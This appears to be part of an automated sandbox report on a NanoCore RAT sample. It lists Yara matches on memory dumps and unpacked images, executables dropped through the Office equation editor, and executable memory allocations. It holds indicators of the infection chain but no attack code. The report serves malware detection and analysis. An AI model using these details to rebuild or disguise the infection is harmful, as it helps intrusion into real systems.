Source: Yara match File source: 00000004.00000002.2090874176.00000000033D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2220469007.0000000003289000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2221628087.0000000002301000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2220153845.0000000002351000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.2088546622.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.2168272542.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2209068863.00000000030A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.2169977777.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2347409859.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2212832493.0000000003239000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2210122241.0000000003255000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: smtpsvc.exe PID: 2416, type: MEMORY
Source: Yara match File source: Process Memory Space: cat464923.exe PID: 2468, type: MEMORY
Source: Yara match File source: Process Memory Space: cat464923.exe PID: 2324, type: MEMORY
Source: Yara match File source: Process Memory Space: cat464923.exe PID: 2668, type: MEMORY
Source: Yara match File source: 17.0.smtpsvc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.smtpsvc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.smtpsvc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cat464923.exe.34e019c.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cat464923.exe.4a0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.smtpsvc.exe.339b366.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.smtpsvc.exe.3444d80.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cat464923.exe.34db366.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.cat464923.exe.32d019c.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.cat464923.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cat464923.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.smtpsvc.exe.334b366.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.smtpsvc.exe.33a019c.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cat464923.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.smtpsvc.exe.33547c5.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cat464923.exe.34e47c5.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.0.cat464923.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.0.cat464923.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.smtpsvc.exe.3174d80.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.smtpsvc.exe.3444d80.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.smtpsvc.exe.335019c.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.cat464923.exe.32d019c.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.cat464923.exe.34a4d80.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cat464923.exe.4a4629.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.smtpsvc.exe.335019c.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.smtpsvc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cat464923.exe.4a0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.cat464923.exe.3304d80.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cat464923.exe.34e019c.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.cat464923.exe.32cb366.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.cat464923.exe.32d47c5.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.cat464923.exe.34a4d80.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cat464923.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.smtpsvc.exe.3174d80.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.smtpsvc.exe.33a47c5.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.smtpsvc.exe.33a019c.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.cat464923.exe.3304d80.6.raw.unpack, type: UNPACKEDPE

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 00000010.00000000.2148512830.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000010.00000000.2148512830.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000002.2347454023.0000000000440000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000012.00000002.2220223642.0000000003359000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000012.00000002.2218871109.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000012.00000002.2218871109.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000000.2088911305.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000000.2088911305.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000011.00000002.2221684497.0000000003309000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000002.2347482313.00000000004A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000004.00000002.2091457817.0000000003585000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000004.00000002.2091457817.0000000003585000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000011.00000000.2184659312.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000011.00000000.2184659312.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000011.00000002.2220476189.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000011.00000002.2220476189.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000002.2351063180.00000000034D9000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.2212946414.0000000003525000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000D.00000002.2212946414.0000000003525000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000010.00000002.2217963570.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000010.00000002.2217963570.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000B.00000002.2213146011.00000000033E5000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000B.00000002.2213146011.00000000033E5000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000010.00000000.2147864826.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000010.00000000.2147864826.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000011.00000000.2148426464.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000011.00000000.2148426464.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.2212398437.0000000003379000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000D.00000002.2212398437.0000000003379000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000010.00000002.2220405288.0000000002281000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000004.00000002.2090874176.00000000033D9000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000004.00000002.2090874176.00000000033D9000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000010.00000002.2220469007.0000000003289000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000011.00000002.2221628087.0000000002301000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000012.00000002.2220153845.0000000002351000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000000.2088546622.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000000.2088546622.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000012.00000000.2168272542.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000012.00000000.2168272542.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000002.2209068863.00000000030A9000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000002.2209068863.00000000030A9000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000012.00000000.2169977777.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000012.00000000.2169977777.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000002.2347409859.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.2347409859.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000B.00000002.2212832493.0000000003239000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000B.00000002.2212832493.0000000003239000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000002.2210122241.0000000003255000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000002.2210122241.0000000003255000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: smtpsvc.exe PID: 2416, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: smtpsvc.exe PID: 2416, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: cat464923.exe PID: 2468, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: cat464923.exe PID: 2468, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: cat464923.exe PID: 2324, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: cat464923.exe PID: 2324, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: cat464923.exe PID: 2668, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: cat464923.exe PID: 2668, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 17.0.smtpsvc.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 17.0.smtpsvc.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 17.0.smtpsvc.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 17.0.smtpsvc.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 17.2.smtpsvc.exe.2324e04.3.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 18.0.smtpsvc.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 18.0.smtpsvc.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.cat464923.exe.34e019c.10.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.cat464923.exe.4a0000.5.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 18.2.smtpsvc.exe.339b366.6.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 18.2.smtpsvc.exe.339b366.6.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.smtpsvc.exe.3444d80.6.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.smtpsvc.exe.3444d80.6.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.cat464923.exe.34db366.8.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.cat464923.exe.34db366.8.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.2.cat464923.exe.32d019c.5.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 16.2.cat464923.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 16.2.cat464923.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.cat464923.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.cat464923.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 17.2.smtpsvc.exe.334b366.5.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 17.2.smtpsvc.exe.334b366.5.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 18.2.smtpsvc.exe.33a019c.5.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.cat464923.exe.440000.2.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.0.cat464923.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.0.cat464923.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 17.2.smtpsvc.exe.33547c5.4.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.cat464923.exe.34e47c5.9.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 16.0.cat464923.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 16.0.cat464923.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.0.cat464923.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 16.0.cat464923.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 12.2.smtpsvc.exe.3174d80.5.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.2.smtpsvc.exe.3174d80.5.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 17.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 17.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.2.cat464923.exe.22a4dc8.3.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.smtpsvc.exe.3444d80.6.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.smtpsvc.exe.3444d80.6.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 17.2.smtpsvc.exe.335019c.6.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 16.2.cat464923.exe.32d019c.5.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.cat464923.exe.24aeb3c.7.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.cat464923.exe.34a4d80.7.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.cat464923.exe.34a4d80.7.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.cat464923.exe.4a4629.4.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 17.2.smtpsvc.exe.335019c.6.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 18.0.smtpsvc.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 18.0.smtpsvc.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.cat464923.exe.4a0000.5.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 18.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 18.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 11.2.cat464923.exe.3304d80.6.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 11.2.cat464923.exe.3304d80.6.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.cat464923.exe.34e019c.10.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 16.2.cat464923.exe.32cb366.6.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 16.2.cat464923.exe.32cb366.6.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.2.cat464923.exe.32d47c5.4.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.cat464923.exe.34a4d80.7.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.cat464923.exe.34a4d80.7.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.0.cat464923.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.0.cat464923.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 12.2.smtpsvc.exe.3174d80.5.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.2.smtpsvc.exe.3174d80.5.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 18.2.smtpsvc.exe.33a47c5.4.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 18.2.smtpsvc.exe.33a019c.5.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 18.2.smtpsvc.exe.2374e04.3.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 11.2.cat464923.exe.3304d80.6.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 11.2.cat464923.exe.3304d80.6.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
.NET source code contains very large strings
Source: catx[1].exe.2.dr, Form1.cs Long String: Length: 11840
Source: 4.2.cat464923.exe.8d0000.0.unpack, Form1.cs Long String: Length: 11840
Source: 4.0.cat464923.exe.8d0000.0.unpack, Form1.cs Long String: Length: 11840
Source: smtpsvc.exe.5.dr, Form1.cs Long String: Length: 11840
Source: 5.0.cat464923.exe.8d0000.2.unpack, Form1.cs Long String: Length: 11840
Source: 5.0.cat464923.exe.8d0000.4.unpack, Form1.cs Long String: Length: 11840
Source: 5.0.cat464923.exe.8d0000.0.unpack, Form1.cs Long String: Length: 11840
Source: 5.2.cat464923.exe.8d0000.6.unpack, Form1.cs Long String: Length: 11840
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\catx[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\cat464923.exe Jump to dropped file
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\user\AppData\Roaming\cat464923.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\cat464923.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Memory allocated: 76D20000 page execute and read and write
Detected potential crypto function
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002EDC28 4_2_002EDC28
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002E0098 4_2_002E0098
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002E5920 4_2_002E5920
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002EBD38 4_2_002EBD38
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002E4D08 4_2_002E4D08
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002E1553 4_2_002E1553
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002E3D8E 4_2_002E3D8E
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002E71C0 4_2_002E71C0
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002E3A61 4_2_002E3A61
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002E2670 4_2_002E2670
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002E36C8 4_2_002E36C8
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002EDF00 4_2_002EDF00
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002E6300 4_2_002E6300
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002EC038 4_2_002EC038
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002E9430 4_2_002E9430
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002E8068 4_2_002E8068
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002E9440 4_2_002E9440
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002E8059 4_2_002E8059
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002EB8A8 4_2_002EB8A8
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002EB8B8 4_2_002EB8B8
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002E98B8 4_2_002E98B8
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002EA8FA 4_2_002EA8FA
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002EBD27 4_2_002EBD27
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002EA920 4_2_002EA920
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002E0500 4_2_002E0500
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002E4168 4_2_002E4168
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002EA970 4_2_002EA970
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002E5D80 4_2_002E5D80
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002E9248 4_2_002E9248
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002E9250 4_2_002E9250
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002EC6B6 4_2_002EC6B6
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002EC6E8 4_2_002EC6E8
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002EDEF4 4_2_002EDEF4
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002E96C1 4_2_002E96C1
